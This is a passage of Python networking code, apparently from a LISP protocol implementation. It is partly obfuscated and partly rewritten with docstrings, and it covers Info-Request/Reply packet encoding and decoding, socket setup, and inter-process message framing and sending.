            OOo0OOO0 = "<none>" if self . hostname == None else self . hostname
            oOo00O = ", hostname: {}" . format ( blue ( OOo0OOO0 , False ) )
        if 38 - 38: I1Ii111 - I11i * i1IIi + iIii1I11I1II1
        lprint ( "{} -> nonce: 0x{}{}" . format ( bold ( o0o0O00O0oo , False ) ,
            lisp_hex_string ( self . nonce ) , oOo00O ) )
    if 41 - 41: Ii1I . OoO0O00 + I1ii11iIi11i + OoOoOO00
    if 76 - 76: iII111i - iIii1I11I1II1
    def encode ( self ) :
        """Pack this message into a byte string.

        An Info-Request stops after the hostname field; an Info-Reply
        continues with the NAT LCAF carrying the ports and RTR list.
        """
        # Top nibble is the message type; bit 27 is the R (reply) bit.
        ooo0OOoo = ( LISP_NAT_INFO << 28 )
        if ( self . info_reply ) : ooo0OOoo |= ( 1 << 27 )
        if 23 - 23: I11i / OoO0O00 % OOooOOo
        if 9 - 9: ooOoO0o % I1ii11iIi11i . OoooooooOO + OoO0O00 % OOooOOo * OoooooooOO
        if 21 - 21: Ii1I % O0
        if 15 - 15: II111iiii * Ii1I + IiII % iII111i
        if 96 - 96: II111iiii * I1Ii111 / Oo0Ooo
        # Header word, 64-bit nonce, then three zero words (presumably
        # key-id/auth-len, TTL, and EID fields -- all zero here).
        IIii1i = struct . pack ( "I" , socket . htonl ( ooo0OOoo ) )
        IIii1i += struct . pack ( "Q" , self . nonce )
        IIii1i += struct . pack ( "III" , 0 , 0 , 0 )
        if 35 - 35: I1IiiI
        if 54 - 54: I1ii11iIi11i % o0oOOo0O0Ooo . i1IIi
        if 72 - 72: Ii1I
        if 87 - 87: iII111i - I1IiiI
        # Info-Request: AFI 0, or AFI-name plus NUL-terminated hostname.
        if ( self . info_reply == False ) :
            if ( self . hostname == None ) :
                IIii1i += struct . pack ( "H" , 0 )
            else :
                IIii1i += struct . pack ( "H" , socket . htons ( LISP_AFI_NAME ) )
                IIii1i += self . hostname + "\0"
            if 54 - 54: iIii1I11I1II1 + oO0o * o0oOOo0O0Ooo % OoooooooOO . Oo0Ooo
            return ( IIii1i )
        if 32 - 32: iII111i
        if 33 - 33: ooOoO0o + Oo0Ooo * OoOoOO00 % ooOoO0o * oO0o - OoO0O00
        if 40 - 40: I11i . OoooooooOO * O0 / I1Ii111 + O0
        if 97 - 97: ooOoO0o - ooOoO0o * OOooOOo % OoOoOO00 - OoOoOO00 - I1Ii111
        if 52 - 52: O0 % iII111i
        # Info-Reply: LCAF (NAT type, length 16) with ms-port, etr-port,
        # global ETR RLOC, empty (AFI 0) ms RLOC, then private ETR RLOC.
        O000oOOoOOO = socket . htons ( LISP_AFI_LCAF )
        O000oo0O0OO0 = LISP_LCAF_NAT_TYPE
        iiii1 = socket . htons ( 16 )
        Oo0OOOoOo0O = socket . htons ( self . ms_port )
        ooI1ii1 = socket . htons ( self . etr_port )
        IIii1i += struct . pack ( "HHBBHHHH" , O000oOOoOOO , 0 , O000oo0O0OO0 , 0 , iiii1 ,
            Oo0OOOoOo0O , ooI1ii1 , socket . htons ( self . global_etr_rloc . afi ) )
        IIii1i += self . global_etr_rloc . pack_address ( )
        IIii1i += struct . pack ( "HH" , 0 , socket . htons ( self . private_etr_rloc . afi ) )
        IIii1i += self . private_etr_rloc . pack_address ( )
        # An empty RTR list is encoded as a single AFI 0.
        if ( len ( self . rtr_list ) == 0 ) : IIii1i += struct . pack ( "H" , 0 )
        if 74 - 74: I11i . II111iiii + O0 * II111iiii
        if 50 - 50: IiII
        if 7 - 7: OoO0O00 / I1IiiI * Ii1I % OoO0O00 + OoO0O00 % II111iiii
        if 83 - 83: O0 % o0oOOo0O0Ooo
        for ooOoOo0O in self . rtr_list :
            IIii1i += struct . pack ( "H" , socket . htons ( ooOoOo0O . afi ) )
            IIii1i += ooOoOo0O . pack_address ( )
        if 77 - 77: I1Ii111 - OoooooooOO
        return ( IIii1i )
    if 2 - 2: OoOoOO00 - OOooOOo * o0oOOo0O0Ooo / OoO0O00 - IiII % I1IiiI
    if 98 - 98: iIii1I11I1II1
    def decode ( self , packet ) :
        """Parse an Info-Request or Info-Reply from packet.

        Returns the ORIGINAL whole buffer on success (not the remainder,
        unlike the other decoders in this file) or None on a malformed or
        truncated packet.  Trailing optional fields (ms RLOC, private
        RLOC, RTR list) are best-effort: running out of bytes there still
        counts as success.
        """
        OO0o0 = packet           # saved so success paths return the whole buffer
        O00oO00oOO00O = "I"
        ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
        if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
        if 49 - 49: I1IiiI - I11i
        ooo0OOoo = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
        ooo0OOoo = ooo0OOoo [ 0 ]
        packet = packet [ ooOoooOoo0oO : : ]
        if 63 - 63: i11iIiiIii . OoO0O00 . oO0o
        O00oO00oOO00O = "Q"
        ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
        if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
        if 85 - 85: oO0o . I1ii11iIi11i + i11iIiiIii
        oOO000 = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
        if 85 - 85: I11i
        ooo0OOoo = socket . ntohl ( ooo0OOoo )
        self . nonce = oOO000 [ 0 ]
        self . info_reply = ooo0OOoo & 0x08000000    # R-bit (bit 27)
        self . hostname = None
        packet = packet [ ooOoooOoo0oO : : ]
        if 36 - 36: ooOoO0o % OoO0O00
        if 1 - 1: OoooooooOO - OoOoOO00
        if 35 - 35: I1Ii111
        if 35 - 35: Oo0Ooo - iIii1I11I1II1 / i1IIi + OoO0O00 - OoooooooOO / i11iIiiIii
        if 79 - 79: I1IiiI * ooOoO0o * ooOoO0o
        O00oO00oOO00O = "HH"
        ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
        if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
        if 92 - 92: iII111i % I1ii11iIi11i
        if 16 - 16: oO0o
        if 52 - 52: OoooooooOO % ooOoO0o - I1Ii111 * I11i
        if 24 - 24: Ii1I + IiII + OoooooooOO / oO0o / I1IiiI + IiII
        if 52 - 52: ooOoO0o
        # Presumably key-id and auth-length; an Info message must carry
        # no authentication data, so a non-zero second field is rejected.
        IIIiI1i , IIII1II11Iii = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
        if ( IIII1II11Iii != 0 ) : return ( None )
        if 38 - 38: OoO0O00 + I1IiiI % IiII
        packet = packet [ ooOoooOoo0oO : : ]
        O00oO00oOO00O = "IBBH"
        ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
        if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
        if 87 - 87: oO0o * Ii1I - I1Ii111 / oO0o
        # Presumably TTL, reserved, mask-len, and EID AFI; the EID AFI
        # must be zero in an Info message.
        oo0o , O0Ooo000OO00 , o00O0Oo , IIi1I11 = struct . unpack ( O00oO00oOO00O ,
            packet [ : ooOoooOoo0oO ] )
        if 84 - 84: II111iiii
        if ( IIi1I11 != 0 ) : return ( None )
        packet = packet [ ooOoooOoo0oO : : ]
        if 16 - 16: OoO0O00
        if 60 - 60: Ii1I
        if 72 - 72: ooOoO0o % I1Ii111
        if 68 - 68: i1IIi
        # Info-Request: optionally parse an AFI-name encoded hostname,
        # then we are done.
        if ( self . info_reply == False ) :
            O00oO00oOO00O = "H"
            ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
            if ( len ( packet ) >= ooOoooOoo0oO ) :
                O000oOOoOOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] ) [ 0 ]
                if ( socket . ntohs ( O000oOOoOOO ) == LISP_AFI_NAME ) :
                    packet = packet [ ooOoooOoo0oO : : ]
                    packet , self . hostname = lisp_decode_dist_name ( packet )
            if 95 - 95: OoOoOO00
            if 82 - 82: II111iiii * I1IiiI * I1ii11iIi11i
            return ( OO0o0 )
        if 79 - 79: o0oOOo0O0Ooo - oO0o . ooOoO0o / ooOoO0o - iII111i / OoooooooOO
        if 58 - 58: ooOoO0o * I1IiiI - OoO0O00 + OOooOOo
        if 79 - 79: Oo0Ooo . i11iIiiIii * OoO0O00 / I11i * OoOoOO00
        if 78 - 78: I11i . I1ii11iIi11i . I1ii11iIi11i
        if 71 - 71: iII111i + IiII + I1IiiI - OoOoOO00
        # Info-Reply: the NAT LCAF header with the translated ports.
        O00oO00oOO00O = "HHBBHHH"
        ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
        if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
        if 49 - 49: I1IiiI % O0 - OoooooooOO * OoO0O00 / iIii1I11I1II1 + I11i
        O000oOOoOOO , O0o000 , O000oo0O0OO0 , O0Ooo000OO00 , iiii1 , Oo0OOOoOo0O , ooI1ii1 = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
        if 7 - 7: iII111i * I1ii11iIi11i / oO0o
        if 31 - 31: I1ii11iIi11i - II111iiii
        if ( socket . ntohs ( O000oOOoOOO ) != LISP_AFI_LCAF ) : return ( None )
        if 86 - 86: IiII % OOooOOo % OoOoOO00 / I1IiiI % OoooooooOO
        self . ms_port = socket . ntohs ( Oo0OOOoOo0O )
        self . etr_port = socket . ntohs ( ooI1ii1 )
        packet = packet [ ooOoooOoo0oO : : ]
        if 83 - 83: i1IIi . OoOoOO00 . i1IIi / OOooOOo * O0
        if 99 - 99: OoooooooOO . OoOoOO00 / II111iiii
        if 64 - 64: iII111i / i1IIi . I1IiiI + O0
        if 5 - 5: O0 . i11iIiiIii
        # Global ETR RLOC (AFI + address), skipped when AFI is 0.
        O00oO00oOO00O = "H"
        ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
        if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
        if 71 - 71: o0oOOo0O0Ooo + iII111i + ooOoO0o
        if 27 - 27: OoooooooOO . iII111i * I1Ii111 % O0 + OoooooooOO - iII111i
        if 86 - 86: i1IIi
        if 81 - 81: OoOoOO00
        O000oOOoOOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] ) [ 0 ]
        packet = packet [ ooOoooOoo0oO : : ]
        if ( O000oOOoOOO != 0 ) :
            self . global_etr_rloc . afi = socket . ntohs ( O000oOOoOOO )
            packet = self . global_etr_rloc . unpack_address ( packet )
            if ( packet == None ) : return ( None )
            self . global_etr_rloc . mask_len = self . global_etr_rloc . host_mask_len ( )
        if 52 - 52: iII111i * IiII % I1IiiI * I11i
        if 73 - 73: I1Ii111 * ooOoO0o
        if 62 - 62: OOooOOo . I1IiiI * iIii1I11I1II1 + OoO0O00 * ooOoO0o / oO0o
        if 14 - 14: iII111i / OoO0O00
        if 75 - 75: IiII
        if 68 - 68: IiII - i1IIi % IiII . OoO0O00 . i11iIiiIii . OoooooooOO
        # From here on the fields are optional: a short packet returns
        # the original buffer (success), not None.
        if ( len ( packet ) < ooOoooOoo0oO ) : return ( OO0o0 )
        if 32 - 32: iII111i + OoO0O00 % IiII + I1IiiI
        O000oOOoOOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] ) [ 0 ]
        packet = packet [ ooOoooOoo0oO : : ]
        if ( O000oOOoOOO != 0 ) :
            self . global_ms_rloc . afi = socket . ntohs ( O000oOOoOOO )
            packet = self . global_ms_rloc . unpack_address ( packet )
            if ( packet == None ) : return ( OO0o0 )
            self . global_ms_rloc . mask_len = self . global_ms_rloc . host_mask_len ( )
        if 69 - 69: I1Ii111 + I11i - iIii1I11I1II1 - II111iiii . Ii1I
        if 74 - 74: I1ii11iIi11i % o0oOOo0O0Ooo + O0 - i11iIiiIii - IiII % OOooOOo
        if 39 - 39: OoO0O00 - o0oOOo0O0Ooo
        if 71 - 71: iII111i . OoO0O00 + ooOoO0o - OOooOOo - Oo0Ooo
        if 100 - 100: OoooooooOO - o0oOOo0O0Ooo + I1Ii111 . OoooooooOO % i11iIiiIii
        # Private ETR RLOC, same optional AFI + address encoding.
        if ( len ( packet ) < ooOoooOoo0oO ) : return ( OO0o0 )
        if 64 - 64: I1Ii111 % OoooooooOO / i1IIi / OoO0O00
        O000oOOoOOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] ) [ 0 ]
        packet = packet [ ooOoooOoo0oO : : ]
        if ( O000oOOoOOO != 0 ) :
            self . private_etr_rloc . afi = socket . ntohs ( O000oOOoOOO )
            packet = self . private_etr_rloc . unpack_address ( packet )
            if ( packet == None ) : return ( OO0o0 )
            self . private_etr_rloc . mask_len = self . private_etr_rloc . host_mask_len ( )
        if 2 - 2: I11i % o0oOOo0O0Ooo . OoO0O00 . OoO0O00
        if 89 - 89: ooOoO0o - oO0o + II111iiii + OoO0O00 - IiII
        if 27 - 27: I1Ii111 - o0oOOo0O0Ooo + OoO0O00
        if 38 - 38: OoOoOO00 + OoO0O00 . i11iIiiIii + Ii1I % i1IIi % I1IiiI
        if 93 - 93: i11iIiiIii
        if 63 - 63: iIii1I11I1II1 - iIii1I11I1II1 % o0oOOo0O0Ooo
        # Remaining (AFI, address) pairs are the RTR list; AFI 0 entries
        # are placeholders and are skipped.
        while ( len ( packet ) >= ooOoooOoo0oO ) :
            O000oOOoOOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] ) [ 0 ]
            packet = packet [ ooOoooOoo0oO : : ]
            if ( O000oOOoOOO == 0 ) : continue
            ooOoOo0O = lisp_address ( socket . ntohs ( O000oOOoOOO ) , "" , 0 , 0 )
            packet = ooOoOo0O . unpack_address ( packet )
            if ( packet == None ) : return ( OO0o0 )
            ooOoOo0O . mask_len = ooOoOo0O . host_mask_len ( )
            self . rtr_list . append ( ooOoOo0O )
        if 97 - 97: i1IIi % I11i % OoOoOO00
        return ( OO0o0 )
if 25 - 25: OoOoOO00 . iIii1I11I1II1 - iII111i % II111iiii . OoOoOO00
if 16 - 16: OOooOOo . Oo0Ooo . I1IiiI % O0 . I1ii11iIi11i + i11iIiiIii
if 100 - 100: I1ii11iIi11i - i1IIi - OoO0O00 * o0oOOo0O0Ooo + OoOoOO00
class lisp_nat_info():
    """NAT translation info learned from an Info-Request sender."""

    def __init__(self, addr_str, hostname, port):
        self.address = addr_str
        self.hostname = hostname
        self.port = port
        self.uptime = lisp_get_timestamp()

    def timed_out(self):
        """True once two Info-Request intervals have passed with no refresh."""
        elapsed = time.time() - self.uptime
        return (elapsed >= (LISP_INFO_INTERVAL * 2))
if 94 - 94: ooOoO0o + OoO0O00 / ooOoO0o - ooOoO0o + Oo0Ooo + o0oOOo0O0Ooo
if 50 - 50: oO0o . Oo0Ooo
if 15 - 15: Ii1I
class lisp_info_source():
    """A source of Info-Requests, cached by address+hostname and by nonce."""

    def __init__(self, hostname, addr_str, port):
        self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
        self.port = port
        self.uptime = lisp_get_timestamp()
        self.nonce = None
        self.hostname = hostname
        self.no_timeout = False

    def cache_address_for_info_source(self):
        """Index this source by its address string plus hostname."""
        key = self.address.print_address_no_iid() + self.hostname
        lisp_info_sources_by_address[key] = self

    def cache_nonce_for_info_source(self, nonce):
        """Remember the nonce so the Info-Reply can be matched back."""
        self.nonce = nonce
        lisp_info_sources_by_nonce[nonce] = self
if 17 - 17: i11iIiiIii * OoO0O00 . o0oOOo0O0Ooo . OoooooooOO . OoOoOO00 - I1ii11iIi11i
if 78 - 78: I1ii11iIi11i - OoooooooOO + O0
if 15 - 15: I1ii11iIi11i / IiII % I1IiiI
if 16 - 16: Ii1I
if 26 - 26: o0oOOo0O0Ooo / I11i + OoOoOO00 / OoOoOO00
if 31 - 31: I1Ii111
if 84 - 84: i11iIiiIii * OOooOOo . iII111i - Ii1I * i1IIi - I1ii11iIi11i
if 1 - 1: II111iiii
if 94 - 94: I1ii11iIi11i * iII111i % iII111i % I11i - iII111i
if 38 - 38: IiII - OoO0O00 % Ii1I - II111iiii
if 97 - 97: O0 . Ii1I
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):
    """Concatenate the unpacked authentication words into one hex string.

    On little-endian (x86) hosts the 64-bit words are byte-swapped first
    (the SHA-1-96 third word is 32 bits, so it gets ntohl instead).  The
    result is zero-filled per-word so the hex string has fixed width.
    """
    if (lisp_is_x86()):
        if (auth1 != ""): auth1 = byte_swap_64(auth1)
        if (auth2 != ""): auth2 = byte_swap_64(auth2)
        if (auth3 != ""):
            if (alg_id == LISP_SHA_1_96_ALG_ID):
                auth3 = socket.ntohl(auth3)
            else:
                auth3 = byte_swap_64(auth3)
        if (auth4 != ""): auth4 = byte_swap_64(auth4)

    if (alg_id == LISP_SHA_1_96_ALG_ID):
        # 64 + 64 + 32 bits -> 16 + 16 + 8 hex digits.
        words = [lisp_hex_string(auth1).zfill(16),
                 lisp_hex_string(auth2).zfill(16),
                 lisp_hex_string(auth3).zfill(8)]
        auth_data = "".join(words)
    if (alg_id == LISP_SHA_256_128_ALG_ID):
        # Four 64-bit words -> 4 x 16 hex digits.
        words = [lisp_hex_string(auth1).zfill(16),
                 lisp_hex_string(auth2).zfill(16),
                 lisp_hex_string(auth3).zfill(16),
                 lisp_hex_string(auth4).zfill(16)]
        auth_data = "".join(words)
    return (auth_data)
if 75 - 75: OoooooooOO / ooOoO0o - iII111i . OoooooooOO . OoOoOO00 % i1IIi
if 7 - 7: OoOoOO00 . i1IIi * i11iIiiIii % i11iIiiIii
if 54 - 54: OoO0O00 / I1IiiI . Oo0Ooo
if 39 - 39: OoO0O00 . ooOoO0o
if 41 - 41: Oo0Ooo * I1ii11iIi11i - II111iiii - II111iiii
if 7 - 7: oO0o
if 41 - 41: ooOoO0o
if 93 - 93: Ii1I + I1Ii111 + Ii1I
if 23 - 23: I1IiiI - i1IIi / ooOoO0o
if 4 - 4: IiII . I1ii11iIi11i + iII111i % ooOoO0o
def lisp_open_listen_socket(local_addr, port):
    """Open and bind a datagram socket for receiving.

    When `port` is numeric, bind a UDP socket on local_addr (IPv4 when
    the address contains '.', IPv6 when it contains ':'; IPv6 is refused
    on Raspbian).  Otherwise `port` names a unix-domain socket path; any
    stale file there is removed before binding.
    """
    if (port.isdigit()):
        if (local_addr.find(".") != -1):
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        if (local_addr.find(":") != -1):
            if (lisp_is_raspbian()): return (None)
            sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
        sock.bind((local_addr, int(port)))
    else:
        sock_name = port
        if (os.path.exists(sock_name)):
            os.system("rm " + sock_name)
            time.sleep(1)
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
        sock.bind(sock_name)
    return (sock)
if 39 - 39: I11i . ooOoO0o * II111iiii
if 21 - 21: Ii1I
if 92 - 92: OoO0O00 * I1ii11iIi11i + iIii1I11I1II1
if 88 - 88: iIii1I11I1II1 + iIii1I11I1II1 * i11iIiiIii . I1ii11iIi11i % oO0o
if 94 - 94: I1IiiI / I1ii11iIi11i / OOooOOo
if 45 - 45: II111iiii
if 98 - 98: i11iIiiIii + I1ii11iIi11i * OOooOOo / OoOoOO00
def lisp_open_send_socket(internal_name, afi):
    """Open a datagram socket for sending.

    An empty internal_name yields an unbound UDP socket of the given
    address family (IPv6 is refused on Raspbian); otherwise a unix-domain
    socket is created and bound at that path, replacing any stale file.
    """
    if (internal_name == ""):
        if (afi == LISP_AFI_IPV4):
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        if (afi == LISP_AFI_IPV6):
            if (lisp_is_raspbian()): return (None)
            sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
    else:
        if (os.path.exists(internal_name)): os.system("rm " + internal_name)
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
        sock.bind(internal_name)
    return (sock)
if 78 - 78: iIii1I11I1II1 - i1IIi . I11i . o0oOOo0O0Ooo
if 66 - 66: OOooOOo * Oo0Ooo
if 58 - 58: OOooOOo
if 96 - 96: IiII % OoooooooOO + O0 * II111iiii / OOooOOo . I1Ii111
if 47 - 47: OoO0O00 - Oo0Ooo * OoO0O00 / oO0o
if 13 - 13: ooOoO0o
if 55 - 55: i1IIi . I11i . II111iiii + O0 + ooOoO0o - i1IIi
def lisp_close_socket(sock, internal_name):
    """Close sock and remove its unix-domain socket file, if one exists."""
    sock.close()
    if (os.path.exists(internal_name)):
        os.system("rm " + internal_name)
    return
if 3 - 3: iIii1I11I1II1 / oO0o
if 61 - 61: I1Ii111 / O0 - iII111i
if 44 - 44: i1IIi
if 23 - 23: I1ii11iIi11i . OoooooooOO / Ii1I + o0oOOo0O0Ooo
if 89 - 89: OoOoOO00 + Oo0Ooo . OoOoOO00 - II111iiii
if 85 - 85: OoooooooOO * OoooooooOO / Ii1I - II111iiii
if 69 - 69: iII111i * I11i
if 43 - 43: o0oOOo0O0Ooo - IiII * Ii1I . i11iIiiIii / II111iiii
def lisp_is_running(node):
    """A LISP component is considered running when its named socket exists."""
    return (os.path.exists(node))
if 61 - 61: OoOoOO00 / I1IiiI . I1ii11iIi11i % OOooOOo
if 70 - 70: OOooOOo * OoOoOO00 / oO0o + Oo0Ooo / O0
if 16 - 16: Oo0Ooo / OoooooooOO / IiII + Oo0Ooo * i11iIiiIii
if 15 - 15: o0oOOo0O0Ooo / i11iIiiIii
if 63 - 63: I1ii11iIi11i - Ii1I + I11i
if 98 - 98: iII111i / IiII * I1IiiI / oO0o - iIii1I11I1II1
if 72 - 72: O0 . OOooOOo
if 99 - 99: i1IIi + iIii1I11I1II1 - ooOoO0o + OoO0O00 + Oo0Ooo . I1ii11iIi11i
if 74 - 74: i1IIi
def lisp_packet_ipc(packet, source, sport):
    """Frame a received packet for IPC: packet@<len>@<source>@<sport>@<data>."""
    return ("@".join(["packet", str(len(packet)), source, str(sport), packet]))
if 80 - 80: ooOoO0o + I1Ii111 . I1ii11iIi11i % OoooooooOO
if 26 - 26: OoOoOO00 . iII111i * iIii1I11I1II1 / IiII
if 69 - 69: OoooooooOO / I11i + Ii1I * II111iiii
if 35 - 35: i11iIiiIii + oO0o
if 85 - 85: OoOoOO00 . O0 % OoooooooOO % oO0o
if 43 - 43: I1IiiI - I11i . I1IiiI / i11iIiiIii % IiII * i11iIiiIii
if 12 - 12: II111iiii - iIii1I11I1II1
if 43 - 43: i11iIiiIii % OoO0O00
if 100 - 100: i1IIi
def lisp_control_packet_ipc(packet, source, dest, dport):
    """Frame a control packet for IPC: control-packet@<dest>@<dport>@<data>.

    Note: `source` is accepted for signature parity with the other IPC
    builders but is not part of the encoding.
    """
    return ("@".join(["control-packet", dest, str(dport), packet]))
if 4 - 4: i11iIiiIii - OOooOOo * IiII % OoooooooOO - OoOoOO00
if 81 - 81: Ii1I * ooOoO0o . oO0o . IiII
if 71 - 71: IiII + OoO0O00
if 39 - 39: I1IiiI % IiII / II111iiii / II111iiii
if 95 - 95: II111iiii + i11iIiiIii + o0oOOo0O0Ooo
if 30 - 30: O0 - O0 % iIii1I11I1II1 + iII111i * OoooooooOO
if 1 - 1: O0
def lisp_data_packet_ipc(packet, source):
    """Frame a data packet for IPC: data-packet@<len>@<source>@@<data>."""
    return ("@".join(["data-packet", str(len(packet)), source, "", packet]))
if 36 - 36: oO0o . iII111i
if 62 - 62: I11i + iIii1I11I1II1 % I11i * OOooOOo + iIii1I11I1II1 % Ii1I
if 56 - 56: o0oOOo0O0Ooo
if 55 - 55: oO0o - I1Ii111 / ooOoO0o % I1IiiI * OoooooooOO * I1IiiI
if 88 - 88: Ii1I + O0
if 92 - 92: I1IiiI % iII111i % I11i + OoooooooOO - i11iIiiIii
if 9 - 9: i11iIiiIii - II111iiii / ooOoO0o
if 81 - 81: i11iIiiIii % OoOoOO00 % OoO0O00 * Ii1I
if 85 - 85: OoooooooOO * ooOoO0o
def lisp_command_ipc(packet, source):
    """Frame a command for IPC: command@<len>@<source>@@<data>."""
    return ("@".join(["command", str(len(packet)), source, "", packet]))
if 23 - 23: OOooOOo / I11i / OoooooooOO - Ii1I / OoO0O00 - OoO0O00
if 60 - 60: OOooOOo . ooOoO0o % i1IIi % Ii1I % ooOoO0o + OoO0O00
if 26 - 26: O0 % o0oOOo0O0Ooo + iII111i * I1ii11iIi11i * I1Ii111
if 4 - 4: OOooOOo * OoooooooOO * i1IIi % I1ii11iIi11i % Oo0Ooo
if 1 - 1: OoO0O00 / iIii1I11I1II1 % I1ii11iIi11i - o0oOOo0O0Ooo
if 62 - 62: I1Ii111 % II111iiii
if 91 - 91: I11i % Ii1I - IiII + iIii1I11I1II1 * iIii1I11I1II1
if 91 - 91: i11iIiiIii + Ii1I
if 85 - 85: I11i % IiII
def lisp_api_ipc(source, data):
    """Frame an API message for IPC: api@<len>@<source>@@<data>."""
    return ("@".join(["api", str(len(data)), source, "", data]))
if 68 - 68: Oo0Ooo . I1Ii111 - o0oOOo0O0Ooo * iIii1I11I1II1 - II111iiii % i1IIi
if 58 - 58: I11i / i11iIiiIii * i11iIiiIii
if 24 - 24: ooOoO0o - I1Ii111 * II111iiii - II111iiii
if 47 - 47: IiII - iIii1I11I1II1 / OoOoOO00 * iII111i - iIii1I11I1II1 % oO0o
if 93 - 93: Ii1I / iII111i
if 100 - 100: Oo0Ooo
if 94 - 94: I1ii11iIi11i / i1IIi * I1IiiI - I11i - I1ii11iIi11i
if 6 - 6: I1ii11iIi11i % o0oOOo0O0Ooo + o0oOOo0O0Ooo / OOooOOo / I1IiiI
if 67 - 67: OoOoOO00 . iII111i / OOooOOo * ooOoO0o + i1IIi
def lisp_ipc(packet, send_socket, node):
    """
    Send IPC message 'packet' to another lispers.net process 'node' via
    'send_socket', splitting it into segments that fit in one datagram.

    A failed segment send is retried with exponential backoff starting
    at 1 ms; after 12 consecutive failures the peer is considered down
    and the rest of the message is dropped.
    """

    # Don't send an IPC message to a process that is not running.
    if (lisp_is_running(node) == False):
        lprint("Suppress sending IPC to {}".format(node))
        return

    # Control-packet IPC messages are allowed jumbo-sized datagrams.
    segment_size = 1500 if (packet.find("control-packet") == -1) else 9000

    offset = 0
    length = len(packet)
    retry_count = 0
    sleep_time = .001
    while (length > 0):
        segment_len = min(length, segment_size)
        segment = packet[offset:segment_len + offset]

        try:
            send_socket.sendto(segment, node)
            lprint("Send IPC {}-out-of-{} byte to {} succeeded".format(
                len(segment), len(packet), node))

            # Successful send resets the backoff state.
            retry_count = 0
            sleep_time = .001

        # Fix: was py2-only "except socket.error, e" (removed in py3).
        except socket.error as e:
            if (retry_count == 12):
                lprint("Giving up on {}, consider it down".format(node))
                break

            lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format(
                len(segment), len(packet), node, e))

            retry_count += 1
            time.sleep(sleep_time)

            lprint("Retrying after {} ms ...".format(sleep_time * 1000))
            sleep_time *= 2
            continue

        # Advance past the segment that was sent successfully.
        offset += segment_len
        length -= segment_len
    return
if 5 - 5: I1ii11iIi11i
if 89 - 89: OoO0O00 - OoOoOO00 / II111iiii . I1ii11iIi11i
if 50 - 50: Ii1I * I1Ii111 * OoooooooOO . OoooooooOO
if 67 - 67: i11iIiiIii % ooOoO0o . I1ii11iIi11i + II111iiii . OoO0O00
if 42 - 42: I11i / OoO0O00 / OoO0O00 * OOooOOo
if 2 - 2: II111iiii % oO0o . I1Ii111
if 100 - 100: OoOoOO00 + OoOoOO00
def lisp_format_packet(packet):
    """
    Return a printable hex dump of 'packet' for logging: the hex digits
    in space-separated groups of 8 characters (4 bytes per group), with
    one trailing space after the last group; "" for an empty packet.

    Fixes the original loop, which compared the offset against a
    doubled, slowly-decremented length and therefore ran past the end
    of the hex string, appending empty groups and extra trailing
    spaces. Also builds the result with join() instead of quadratic
    string +=, and handles hexlify() returning bytes on Python 3.
    """
    hex_str = binascii.hexlify(packet)
    # py3 hexlify() returns bytes; py2 returns str (isinstance str there).
    if (isinstance(hex_str, bytes) and not isinstance(hex_str, str)):
        hex_str = hex_str.decode()

    groups = [hex_str[i:i + 8] for i in range(0, len(hex_str), 8)]
    if (groups == []): return("")
    return(" ".join(groups) + " ")
if 28 - 28: Ii1I + O0
if 44 - 44: oO0o
if 51 - 51: o0oOOo0O0Ooo * o0oOOo0O0Ooo . Ii1I
if 14 - 14: OoO0O00 . I11i % II111iiii % i11iIiiIii + OoooooooOO
if 50 - 50: i11iIiiIii * I11i + i11iIiiIii - i1IIi
if 69 - 69: I1IiiI + IiII + oO0o * I1ii11iIi11i . iIii1I11I1II1 / OoooooooOO
if 77 - 77: Oo0Ooo - ooOoO0o
def lisp_send(lisp_sockets, dest, port, packet):
    """
    Send LISP control packet 'packet' to 'dest'/'port'.

    lisp_sockets[0] is the IPv4 socket, lisp_sockets[1] the IPv6
    socket. When LISP_RLOC_PROBE_TTL is 255 and the packet is an
    RLOC-probe Map-Request/Map-Reply (first byte 0x12 or 0x28), the
    socket TTL is raised for this send and restored to 64 afterwards.
    """
    lisp_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]

    # An IPv4-mapped IPv6 address ("::ffff:a.b.c.d") is really an IPv4
    # destination. An RTR always uses the IPv4 socket for it; if no
    # IPv6 socket exists, fall back to the IPv4 socket and strip the
    # mapping prefix from the address string.
    address = dest.print_address_no_iid()
    if (address.find("::ffff:") != -1 and address.count(".") == 3):
        if (lisp_i_am_rtr): lisp_socket = lisp_sockets[0]
        if (lisp_socket == None):
            lisp_socket = lisp_sockets[0]
            address = address.split("::ffff:")[-1]

    lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
        len(packet), bold("to " + address, False), port,
        lisp_format_packet(packet)))

    # Decide if this is an RLOC-probe that should go out with the probe
    # TTL; the first byte of a LISP control message carries the type.
